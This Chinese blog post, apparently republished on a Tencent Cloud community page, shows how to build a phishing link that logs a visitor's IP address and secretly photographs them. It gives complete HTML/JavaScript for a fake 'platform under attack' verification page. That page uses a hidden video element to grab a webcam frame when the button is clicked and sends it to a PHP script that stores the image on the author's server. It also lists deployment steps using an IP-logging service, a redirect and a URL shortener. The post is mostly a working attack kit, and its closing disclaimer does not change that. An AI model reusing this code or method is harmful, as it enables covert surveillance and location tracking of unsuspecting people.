点开一个网址我被记录了ip还偷拍了照片
突发奇想的思路,既然可以记录IP我为什么不可以更方便些,顺手偷拍攻击对象,看看他长啥样!
因为事先已经有了IP记录平台,所以方便省事,直接开始研究偷拍
点开一个网址我被记录了ip还偷拍了照片 社会工程学 安全文摘 安全文摘 第1张
随手写了偷拍页面前端,伪造的受攻击验证(将就看,毕竟只是做一次演示)
Post引用
点开一个网址我被记录了ip还偷拍了照片 社会工程学 安全文摘 安全文摘 第2张
前端代码
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>人机验证机制</title>
<meta name='Generator' content='EditPlus'>
<meta name="viewport" content="width=device-width, user-scalable=no,initial-scale=1, minimal-ui">
<meta name='Description' content='inveted by: http://davidwalsh.name/browser-camera'>
<script type="text/javascript" src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.js"></script>
<style>
html body{width: 100%;height:auto;margin:0 auto 0px;padding:0 0 0px;background-color: #444 }
a{text-decoration:none; }
.wenzi{width: 300px;height: 300px; margin-right: auto;margin-left: auto; }
.yuyan{width: 100% ; height: 150px ; color: #fff; margin-top: 60px; text-align: center;}
.sf{width: 100%;height: 150px; line-height: 150px ;text-align: center;}
.sf a{display: block;font-size: 12px;margin-left: 28%; text-decoration: none; text-align: center;background-color: #EBEBEB; width: 50px;height: 20px;line-height: 20px; border:solid 1px #222; float: left; }
.sf button{display: block; font-size: 13px; margin-left: 10px ; text-align: center;background-color: #EBEBEB; width: 50px;height: 22px; border:solid 1px #222; float: left;}
</style>
<script>
window.addEventListener("DOMContentLoaded", function() {
// Grab elements, create settings, etc.
var canvas = document.getElementById('canvas');
var context = canvas.getContext('2d');
var video = document.getElementById('video');
var mediaConfig = { video: true };
var errBack = function(e) {
console.log('An error has occurred!', e)
};
// Put video listeners into place
if(navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
navigator.mediaDevices.getUserMedia(mediaConfig).then(function(stream) {
video.src = window.URL.createObjectURL(stream);
video.play();
});
}
/* Legacy code below! */
else if(navigator.getUserMedia) { // Standard
navigator.getUserMedia(mediaConfig, function(stream) {
video.src = stream;
video.play();
}, errBack);
} else if(navigator.webkitGetUserMedia) { // WebKit-prefixed
navigator.webkitGetUserMedia(mediaConfig, function(stream){
video.src = window.webkitURL.createObjectURL(stream);
video.play();
}, errBack);
} else if(navigator.mozGetUserMedia) { // Mozilla-prefixed
navigator.mozGetUserMedia(mediaConfig, function(stream){
video.src = window.URL.createObjectURL(stream);
video.play();
}, errBack);
}
// Trigger photo take
document.getElementById('snap').addEventListener('click', function() {
context.drawImage(video, 0, 0, 640, 480);
var url = canvas.toDataURL('image/png');
document.getElementById('result').value = url;
var uu=url.substr(22);
$(document).ready(function(){
$.ajax({
cache: true,
type: "POST",
url:"jieshou.php",
data:$('#tp').serialize(),
async: false,
error: function(request) {
alert("Connection error");
},
success: function(data) {
$(".return").parent().html(data);
}
});
});
});
}, false);
</script>
</head>
<body>
<div class="wenzi">
<div class="yuyan">
目前平台正在遭受攻击!
<br/>
<br/>
显示非正常请使用UC浏览器访问!
</div>
<div class="sf">
<button id='snap'>确定</button>
</div>
</div>
<div>
<video id='video' width='0' height='0'></video>
<canvas style="width:0px;height:0px" id='canvas' width='640' height='480'></canvas>
<form id="tp" action="./jieshou.php" method="post">
<input type="hidden" type="file" value="sdgsdg" id="demo_input" />
<input type="hidden" name="img" id="result" value="" />
<p id="img_area"></p>
<input type="hidden" type="submit" value="提交">
</form>
</div>
<div class= "return"></div>
</body>
</html>jishu.php
点开一个网址我被记录了ip还偷拍了照片 社会工程学 安全文摘 安全文摘 第3张
后端代码
<?php
error_reporting(0);
$base64_img = trim($_POST['img']);
$up_dir = './upload/';//存放在当前目录的upload文件夹下
if(!file_exists($up_dir)){
mkdir($up_dir,0777);
}
if(preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_img, $result)){
$type = $result[2];
if(in_array($type,array('pjpeg','jpeg','jpg','gif','bmp','png'))){
$new_file = $up_dir.date('YmdHis_').'.'.$type;
if(file_put_contents($new_file, base64_decode(str_replace($result[1], '', $base64_img)))){
$img_path = str_replace('../../..', '', $new_file);
echo '网站正在遭受攻击,请稍后访问';
}
}
}绑定域名并存放至根目录前往ip.heibai.org生成定位链接
点开一个网址我被记录了ip还偷拍了照片 社会工程学 安全文摘 安全文摘 第4张
(因为平台都是我的,所以我可以自由修改定位链接内容!!!如果要实践定位链接请自行搭建)
点开一个网址我被记录了ip还偷拍了照片 社会工程学 安全文摘 安全文摘 第5张
马赛克部分为偷拍地址,设置1秒跳转
点开一个网址我被记录了ip还偷拍了照片 社会工程学 安全文摘 安全文摘 第6张
百度短网址生成链接,开始测试阶段
点开一个网址我被记录了ip还偷拍了照片 社会工程学 安全文摘 安全文摘 第7张
IP记录成功,接下来是激动人心的时刻,看看是否偷拍成功
点开一个网址我被记录了ip还偷拍了照片 社会工程学 安全文摘 安全文摘 第8张
查看了我的图片存放目录,成功了的
点开一个网址我被记录了ip还偷拍了照片 社会工程学 安全文摘 安全文摘 第9张
嗯,对,证明我的思路是可行的。
本文仅作为思路分享。
请规范用途!
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020-01-17),如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
